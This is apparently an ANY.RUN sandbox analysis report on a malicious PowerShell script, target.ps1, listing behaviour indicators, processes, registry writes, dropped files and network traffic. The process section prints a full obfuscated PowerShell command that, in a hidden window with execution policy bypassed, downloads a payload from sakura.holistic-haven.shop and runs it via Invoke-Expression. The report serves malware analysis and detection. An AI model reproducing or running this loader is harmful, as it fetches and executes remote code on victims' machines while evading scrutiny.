File name:

target.ps1

Full analysis: https://app.any.run/tasks/e0768dd4-19fb-4a04-b55a-0ec3f01bca4b
Verdict: Malicious activity
Analysis date: December 17, 2024, 04:22:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (4185), with no line terminators
MD5:

C004420872ECFC2076EBC17E9602B37D

SHA1:

170FE6B4E35E6C8A740C0840158F103B917C7EC5

SHA256:

62951B45BD7536ACE427D18E0C026D636F3EBA616FCB878B29F15ABBEEAC7916

SSDEEP:

48:TZ8Hrfn23dD3/R7C/nVVIfp8Ss8l6h90YjJT35vzxp68ToH1dO4lE97c2DOHZYSc:T68/Q/nIfpKl1Bzv6f3hEKGOr9Vu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1476)
      • powershell.exe (PID: 2216)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1476)
      • powershell.exe (PID: 2216)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2216)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 1476)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 2216)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 1476)

  • SUSPICIOUS

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 1476)

    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 1476)

    • Executes script without checking the security policy

      • powershell.exe (PID: 2216)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 1476)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 1476)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 1476)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 1476)
      • powershell.exe (PID: 2216)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1476)

    • Disables trace logs

      • powershell.exe (PID: 2216)
      • powershell.exe (PID: 1476)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1476)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1476)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1476)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1476)

    • The process uses the downloaded file

      • powershell.exe (PID: 1476)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
120
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1476"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\target.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2132\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2216"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://sakura.holistic-haven.shop/singl6';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3620\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
10 297
Read events
10 283
Write events
14
Delete events
0

Modification events

(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2216) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
5
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
1476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF2F3KW9M87YTEBOOKOO.tempbinary
MD5:55CD88CB53F2F0C097D1FC8C008C3D6B
SHA256:C23803D8DDD1060ACC5A421F78473CE508C16AC6F4250DE31EF3C7E33DCFDB7B
1476powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rraixlv0.q4u.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2216powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_veaorycx.wrq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2216powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ube30nw.b0j.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2216powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
1476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF135db3.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
1476powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:55CD88CB53F2F0C097D1FC8C008C3D6B
SHA256:C23803D8DDD1060ACC5A421F78473CE508C16AC6F4250DE31EF3C7E33DCFDB7B
1476powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yk4ymqid.0mu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1476powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5BA0F7F0F114D4853DB9144434391C5A
SHA256:973C2AE98C176B373D086048037FA1B24E027B4A6B4F71412EB7D365EF467818
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
56
TCP/UDP connections
24
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3884
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3884
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
302
142.250.185.100:443
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De1137900703e5052:TM%3D1734409362:C%3D%3E:IP%3D180.75.236.253-:S%3Dn39doRJaH88ZN-JolI7OWw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+07:22:42+GMT
unknown
html
233 b
whitelisted
GET
302
142.250.185.100:443
https://google.com/a/cpanel/index.js
unknown
html
382 b
whitelisted
GET
302
142.250.185.100:443
https://google.com/a/cpanel/index.js
unknown
html
382 b
whitelisted
GET
302
142.250.185.228:443
https://google.com/a/cpanel/index.js
unknown
html
382 b
whitelisted
GET
302
142.250.185.228:443
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D8eed9530ab974a88:TM%3D1734409385:C%3D%3E:IP%3D180.75.236.253-:S%3DEjIvEdx0CBT-iWhA2tb2ew%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+07:23:05+GMT
unknown
html
233 b
whitelisted
GET
200
104.21.112.1:443
https://sakura.holistic-haven.shop/singl6
unknown
text
9.21 Mb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3884
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.23.209.187:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
1476
powershell.exe
142.250.186.78:443
google.com
GOOGLE
US
whitelisted
3884
svchost.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
www.bing.com
  • 2.23.209.187
  • 2.23.209.133
  • 2.23.209.130
whitelisted
google.com
  • 142.250.186.78
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
www.google.com
  • 142.250.184.228
whitelisted
sakura.holistic-haven.shop
  • 104.21.112.1
  • 104.21.80.1
  • 104.21.96.1
  • 104.21.32.1
  • 104.21.64.1
  • 104.21.48.1
  • 104.21.16.1
unknown
self.events.data.microsoft.com
  • 52.168.117.168
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
target.ps1